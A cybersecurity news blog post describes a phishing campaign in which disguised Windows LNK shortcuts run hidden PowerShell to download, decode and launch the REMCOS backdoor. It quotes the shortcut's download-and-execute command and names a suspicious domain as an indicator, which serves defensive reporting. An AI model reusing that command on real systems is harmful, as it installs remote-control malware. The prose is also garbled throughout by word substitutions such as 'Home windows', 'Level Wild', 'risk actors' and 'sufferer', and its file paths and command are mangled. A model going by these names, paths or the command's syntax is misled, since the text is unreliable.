Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New Malware Attack Weaponizing LNK Files to Install The REMCOS Backdoor on Windows Machines

Posted on August 4, 2025August 4, 2025 By CWS

In current weeks, cybersecurity groups have noticed a surge in malicious campaigns exploiting Home windows shortcut (LNK) information to ship subtle backdoors.

This new wave of assaults disguises LNK shortcuts as innocuous paperwork or folders, counting on Home windows’ default habits of hiding identified file extensions to deceive customers.

As soon as executed, the shortcut silently invokes PowerShell with hidden window parameters, fetching and decoding a Base64 payload that in the end installs the REMCOS backdoor.

The stealthy nature of this chain—combining social engineering, fileless scripting, and living-off-the-land binaries—underscores the evolving techniques of risk actors focusing on enterprise environments.

Level Wild analysts famous that the preliminary supply usually arrives by way of phishing emails, with attachments labeled as invoices or transport paperwork.

In different circumstances, risk actors plant these malicious shortcuts inside ZIP or RAR archives on community shares, relying on informal shopping to set off execution.

How LNK File look to a standard person (Supply – Level Wild)

Upon double-clicking, the LNK file silently launches powershell.exe -WindowStyle hidden -Command (…), directing the sufferer’s machine to obtain an obfuscated payload from a distant server.

Level Wild researchers recognized that the downloaded file masquerades with a .GIF extension however incorporates Base64-encoded binary knowledge.

The marketing campaign’s spine is a multi-stage an infection workflow. The embedded PowerShell script retrieves an encoded textual content useful resource, writes it to C:ProgramDataHEW.GIF, decodes it right into a Home windows PIF file named CHROME.PIF by way of [System.Convert]::FromBase64String, then executes this binary.

Content material of LNK file (Supply – Level Wild)

The PIF file, disguised as a Chrome-themed program, leverages legacy assist for MS-DOS shortcuts to bypass trendy safety warnings. As soon as launched, it drops extra artifacts—together with a scheduled process shortcut and a URL file—to make sure persistence and facilitate additional payload execution.

Affect assessments reveal that the REMCOS backdoor grants attackers full distant management over compromised hosts.

REMCOS communicates over TCP with a customized binary protocol, enabling arbitrary shell command execution, file switch, keylogging, and even webcam seize.

Victims usually stay unaware of the breach, because the malware shops keystroke logs in C:ProgramDataremcoslogs.dat and establishes encrypted channels with command-and-control servers hosted in Jap Europe.

The mix of stealthy execution and strong distant capabilities poses a major threat to company networks, the place lateral motion and knowledge exfiltration can observe preliminary compromise.

An infection Mechanism

The an infection mechanism hinges on exploiting LNK file properties to load malicious instructions. Not like Workplace macros, LNK information don’t set off macro safety warnings, permitting execution with out person suspicion.

On this marketing campaign, the LNK’s “Goal” subject is about to:-

C:windowsSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -Command (new-object System.Internet.WebClient).DownloadFile(‘ $file=”C:ProgramDataHEW.GIF”; [System.Convert]::FromBase64String((Get-Content material $file)) | Set-Content material C:ProgramDataCHROME.PIF -Encoding Byte; begin C:ProgramDataCHROME.PIF

This single-line command demonstrates the class of fileless assaults: it makes use of System.Internet.WebClient to fetch the Base64 blob, then decodes and executes it completely in reminiscence.

Whereas the an infection workflow exhibits that how Home windows shows the misleading .lnk icon, hiding the precise payload path.

An infection Workflow (Supply – Level Wild)

Attackers additional obfuscate detection by embedding malware inside Alternate Knowledge Streams or crafting the icon path to level to malicious DLLs, triggering code execution when Home windows makes an attempt to render the shortcut icon.

By weaponizing LNK information, adversaries bypass many endpoint protections that target executable file blocks and macro detections.

The reliance on trusted system binaries, similar to PowerShell and CMD, permits the REMCOS installer to evade signature-based antivirus instruments.

For defenders, monitoring uncommon PowerShell invocations and outbound connections to suspicious domains like shipping-hr.ro is important.

Enhanced visibility into scheduled duties, ADS utilization, and newly created .PIF information will help determine and include this rising risk.

Combine ANY.RUN TI Lookup along with your SIEM or SOAR To Analyses Superior Threats -> Strive 50 Free Trial Searches

Cyber Security News Tags:Attack, Backdoor, Files, Install, LNK, Machines, Malware, Remcos, Weaponizing, Windows

Post navigation

Previous Post: Threat Actors Exploitation Attempts Spikes as an Early Indicator of New Cyber Vulnerabilities
Next Post: AI Guardrails Under Fire: Cisco’s Jailbreak Demo Exposes AI Weak Points

Related Posts

Streamlined Patch Management for Endpoint Device Security Cyber Security News
New TokenBreak Attack Bypasses AI Model’s with Just a Single Character Change Cyber Security News
Understanding OWASP Top 10 – Mitigating Web Application Vulnerabilities Cyber Security News
Google Chrome May Soon Turn Webpages Into Podcasts With AI Audio Overviews Cyber Security News
North Korean APT Hackers Attacking Ukrainian Government Agencies to Steal Login Credentials Cyber Security News
SAP’s July 2025 Patch Day Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Nvidia Triton Vulnerabilities Pose Big Risk to AI Models
  • NVIDIA Triton Bugs Let Unauthenticated Attackers Execute Code and Hijack AI Servers
  • Mozilla Warns of Phishing Attacks Targeting Add-on Developers Account
  • Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
  • FUJIFILM Printers Vulnerability Let Attackers Trigger DoS Condition

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Nvidia Triton Vulnerabilities Pose Big Risk to AI Models
  • NVIDIA Triton Bugs Let Unauthenticated Attackers Execute Code and Hijack AI Servers
  • Mozilla Warns of Phishing Attacks Targeting Add-on Developers Account
  • Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
  • FUJIFILM Printers Vulnerability Let Attackers Trigger DoS Condition

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News